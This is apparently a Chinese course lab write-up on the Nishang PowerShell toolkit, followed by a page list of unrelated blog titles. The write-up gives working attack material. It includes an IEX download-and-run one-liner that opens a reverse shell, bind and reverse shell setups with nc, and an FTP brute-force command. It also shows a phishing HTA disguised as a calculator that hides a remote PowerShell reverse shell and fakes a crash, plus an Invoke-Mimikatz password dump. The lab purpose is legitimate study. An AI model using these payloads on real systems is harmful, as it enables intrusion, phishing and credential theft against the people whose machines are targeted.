一、介绍

  • Nishang是基于PowerShell的渗透测试专用工具,它集成了框架、脚本和各种payload,被广泛应用于渗透测试的各个阶段。

二、使用

  • 下载脚本工具:Nishang
  • Nishang需要我们的Powershell版本在v3以上才能使用。
    • 查看当前Powershell版本:get-host

  • 进入相应目录下
  • 导入框架:Import-Module .\nishang.psm1
  • 模块介绍

    • 信息搜集:Gather
    • 域相关脚本:Get-Unconstrained
    • 一个ASPX的Webshell:Antak Webshell
    • 后门:Backdoors
    • Client进行有效钓鱼:Client
    • 权限提升:Escalation
    • 更详细的介绍和使用我们学习参考Powershell 渗透测试工具-Nishang
  • 导入框架后,在使用对应脚本时,可以使用Get-Help 脚本名称 -full得到一些使用提示
  • 两种在内存当中去加载脚本的方式
    • powershell iex (New-Object Net.WebClient).DownloadString('http:///Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress [IP] -Port [PortNo.](IEX为远程下载脚本)
    • 第二种:
      • 使用Invoke-Encode脚本来将我们现有的脚本编码压缩:Invoke-Encode -DataToEncode "nishang-master\Shells\Invoke-PowerShellTcp.ps1" -OutCommand
      • 在目标上执行:powershell -e [encodedscript]

三、Nishang渗透测试

1、TCP交互式Shell

  • Invoke-PowerShellTcp是PowerShell交互式正向连接或反向连接shell,且基于TCP协议。
  • 参数
    • -Port需要正向监听的端口或要反向连接的端口。
    • -Bind正向连接
    • -IPAddress选择反向连接时需要连接到的IP地址
    • -Reverse反向连接
  • 正向连接
    • 在靶机运行脚本,监听端口5330:Invoke-PowerShellTcp -Bind -Port 5330
    • 使用nc连接到靶机端口5330:nc -nv 192.168.17.131 5330(这里IP为win10)



      成功获取shell~
  • 反向连接
    • 使用nc监听本地端口5330:nc -ltp 5330
    • 在靶机上反弹shell:Invoke-PowerShellTcp -Reverse -IPAddress 192.168.17.130 -Port 5330(这里IP为kali)



      成功获取shell~
  • 脚本分析
    • 我们先使用Get-Help Invoke-PowerShellTcp -full查看信息(以下为部分,我们可以重点看语法、说明还有示例,这条命令所显示的就是脚本中的注释部分~)

    • 运行参数

    • 主函数部分
      • 我们可以参考所学的socket编程,在wireshark中抓包,我们可以看到TCP数据包,脚本中将靶机作为服务端,在建立三次握手后,服务端会向攻击方发送数据
        $sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")
        $stream.Write($sendbytes,0,$sendbytes.Length)

      • 攻击方获取shell后输入命令时,靶机会接收并执行相应命令,在输出
        $sendback = (Invoke-Expression -Command $data 2>&1 | Out-String )

2、服务爆破

  • 在之前的学习中我们利用Nishang中的扫描模块,尝试了对FTP服务器的爆破,效果如下:

  • 显示爆破过程:Invoke-BruteForce -ComputerName 192.168.80.129 -UserList C:\Users\ASUS\Desktop\username.txt -PasswordList C:\Users\ASUS\Desktop\pass.txt -Service ftp -verbose

  • wireshark中可以看到当爆破后,ftp服务器端与本地的信息交互,本地确认完得到结果后退出。
    # 获取返回信息
    $result = $ftpRequest.GetResponse()
    $message = $result.BannerMessage + $result.WelcomeMessage # 打印信息到控制台
    Write-Output "Match $username : $Password"
    $success = $true

3、利用HTA反弹获取shell

  • Nishang中有对客户端进行钓鱼的模块——Client,利用该模块生成各种感染的文件如HTA、Word,来执行powershell脚本发动攻击。
  • HTA,HTML-Application的缩写,它直接将某个html页面保存成hta的格式,打开时显示为窗口交互界面,就是一个独立的应用软件。
  • 使用Nishang中的Out-HTA生成带有payload的hta文件:Out-HTA -PayloadScript C:\Users\ASUS\Desktop\nishang-master\Shells\Invoke-PowerShellTcpOneLine.ps1



    这里生成的文件是闪退的...长时间打不开..
  • 借用一篇文中的代码,修改这个生成hta的脚本。
    • 首先生成一个可以弹出系统计算器的代码
      <title>Caculate</title>
      <center>
      <h1>Caculate.exe</h1>
      <br>
      <h2>Loading...</h2>
      <br>
      [<marquee scrollAmount=4 width=350 direction=right>|||||||||||||</marquee>]100%
      <br>
      </center>
      <script language="VBScript">
      Set Hackdo = CreateObject("Wscript.Shell")
      Set Check = CreateObject("Scripting.FileSystemObject")
      If Check.FileExists(Hackdo.ExpandEnvironmentStrings("%PSModulePath%") + "..\powershell.exe") Then
      Hackdo.Run "powershell.exe -nop -w hidden calc.exe"
      End If
      </script>

      Hackdo.Run为调用Wscript.shell中的运行外部程序的函数——run,后面跟着一条powershell命令,用powershell开启计算器。

    • 然后我们可以设置出假装闪退效果,在后面添加下面代码
      Hackdo.Run "taskkill /f /im mshta.exe"

      这里我们只是杀死了mshta.exe这个进程,而shellcode是注入在powershell中执行的,它的进程还在~

  • 要生成反弹shell,就要修改后面调用powershell执行的部分,原代码中是在生成时用参数调用生成reverse的脚本:Out-HTA -PayloadScript C:\nishang\Shells\Invoke-PowerShellTcpOneLine.ps1,但是kali那边监听没反应
  • 于是换成了直接远程调用脚本,并用vbhide用来隐藏powershell的弹窗。主要代码如下:
    <body>
    <title>XXX-exp</title>
    <center>
    <h1>Caculate.exe</h1>
    <br>
    <h2>Loading...</h2>
    <br>
    [<marquee scrollAmount=4 width=350 direction=right>|||||||||||||</marquee>]100%
    <br>
    </center>
    <script language="VBScript">
    Set Hackdo = CreateObject("Wscript.Shell")
    Set Check = CreateObject("Scripting.FileSystemObject")
    If Check.FileExists(Hackdo.ExpandEnvironmentStrings("%PSModulePath%") + "..\powershell.exe") Then
    Hackdo.Run "powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/9a3c747bcf535ef82dc4c5c66aac36db47c2afde/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 192.168.80.131 -port 5330",vbhide
    Hackdo.Run "taskkill /f /im mshta.exe"
    End If
    </script>
    </body>
    </html>
    • windows中生成HTA:out-hta
    • kali下监听端口:nc -lv 5330
    • windows下打开HTA
  • 终于获取shell

4、Mimikatz结合Powershell 获取目标主机账号密码

  • mimikatz是由C语言编写的开源小工具,功能非常强大。它支持从Windows系统内存中提取明文密码、哈希、PIN码和Kerberos凭证,以及pass-the-hash、pass-the-ticket、build Golden tickets等数种黑客技术。
  • 注意我们要使用管理员身份运行PowerShell
  • 导入Nishang框架Import-Module .\nishang.psm1
  • 使用Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::logonPasswords full"'获取密码

参考资料

Final——Nishang的更多相关文章

  1. 2018-2019-2 20165330《网络对抗技术》Exp10 Final 基于PowerShell的渗透实践

    目录 实验内容 实验步骤 实验中遇到的问题 实验总结与体会 实验内容 PoweShell简介 PowerShell入门学习 PowerShell渗透工具介绍 相关渗透实践分析 ms15-034之Pow ...

  2. java抽象、接口 和final

    抽象 一.抽象类:不知道是具体什么东西的类. abstract class 类名 1.抽象类不能直接new出来. 2.抽象类可以没有抽象方法. public abstract class USB { ...

  3. Java内部类final语义实现

    本文描述在java内部类中,经常会引用外部类的变量信息.但是这些变量信息是如何传递给内部类的,在表面上并没有相应的线索.本文从字节码层描述在内部类中是如何实现这些语义的. 本地临时变量 基本类型 fi ...

  4. Java关键字final、static

    一.final根据程序上下文环境,Java关键字final有“这是无法改变的”或者“终态的”含义,它可以修饰非抽象类.非抽象类成员方法和变量.你可能出于两种理解而需要阻止改变:设计或效率. final ...

  5. JavaSE 之 final 初探

    我们先看一道面试题: 请问 final 的含义是什么?可以用在哪里?其初始化的方式有哪些? 首先我们回答一下这道题,然后再探究其所以然.  1.final 表示“最终的”.“不可改变的”,意指其修饰类 ...

  6. PHP的final关键字、static关键字、const关键字

    在PHP5中新增加了final关键字,它可以加载类或类中方法前.但不能使用final标识成员属性,虽然final有常量的意思,但在php中定义常量是使用define()函数来完成的. final关键字 ...

  7. final修饰符

    final本身的含义是"最终的,不可变的",它可以修饰非抽象类,非抽象方法和变量.注意:构造方法不能使用final修饰,因为构造方法不能被继承,肯定是最终的. final修饰的类: ...

  8. 浅析Java中的final关键字(转载)

    自http://www.cnblogs.com/dolphin0520/p/3736238.html转载 一.final关键字的基本用法 在Java中,final关键字可以用来修饰类.方法和变量(包括 ...

  9. java关键字extends(继承)、Supe(父类引用空间)、 This(方法调用者对象)、Instanceof(实例类型-判断对象是否属于某个类)、final(最终)、abstract(抽象) 、interface(接口)0

    java 继承使用关键字extends   继承的作用:减少代码量,优化代码 继承的使用注意点: 1子类不能继承父类的私有变量 2.子类不能继承父类的构造方法 3.子类在调用自己的构造方法时 会默认调 ...

随机推荐

  1. git diff 的简单使用(比较版本区别)

    假如我们修改viewMail.vue 文件(部分代码) 从 //根据ID获取详情 getById () { let that = this; this.viewMailModal = true; th ...

  2. mysql5.7 密码字段名更改

    由password更改为authentication_string update user set authentication_string=password("123456") ...

  3. synchronized 底层实现原理

    线程在获取锁的时候,其指针指向的是一个monitor对象(由C++实现)的起始地址.每个对象实例都会有一个 monitor.其中monitor可以与对象一起创建.销毁:亦或者当线程试图获取对象锁时自动 ...

  4. Python应用范围seo

    Python有许多OOP概念,包括类.对象.数据和方法.抽象.封装.继承和多态性等原则也可以使用Python实现和表示.python有几个高级函数,包括迭代器.生成器.列表分析器.lambda表达式和 ...

  5. 17.SpringMVC核心技术-拦截器

    SpringMVC 中的 Interceptor 拦截器是非常重要和相当有用的,它的主要作用是拦截指定 的用户请求, 并进行相应的预处理与后处理.其拦截的时间点在“处理器映射器根据用户提 交的请求映射 ...

  6. bootsctrap4 datepicker时间选择插件

    现在网上基本都是v3的时间选择插件,花了点时间改了找了个v4能用的 bootstrap-datepicker <!DOCTYPE html> <html> <head&g ...

  7. Java攻城狮面试题录:笔试篇(1)

    1.作用域public,private,protected,以及不写时的区别答:区别如下:不写时默认为friendly 2.ArrayList和Vector的区别,HashMap和Hashtable的 ...

  8. 一篇关于ajax跨域问题的解决方案

    这几天没事,我有一个好友,让我帮他做一个机器人对话demo, 我说 看看有没有时间(其实自己一脸懵逼) 然后百度了一下,发现了一个机器人  -(连接就不弄出来了,可以私底下交流) ,,我是用这个的 好 ...

  9. php连接oracle oracle开启扩展

    <?php /** * 由于公司的需要,使用php+oracle开发项目,oracle因为有专门人员开发设计,我们只需远程调用 *于是乎遇到了蛋疼的问题就是开启oracle扩展的问题,虽然你在p ...

  10. SqlServer和Oralce保留几位小数以及当末尾小数为0也显示

    需求描述:对数字类型值保留2位小数,当2位小数末尾出现0时也显示 SqlServer处理方法: 1.首先通过Round函数保留2位有效数字,多出的位数值变成0 2.通过Cast函数转成decimal( ...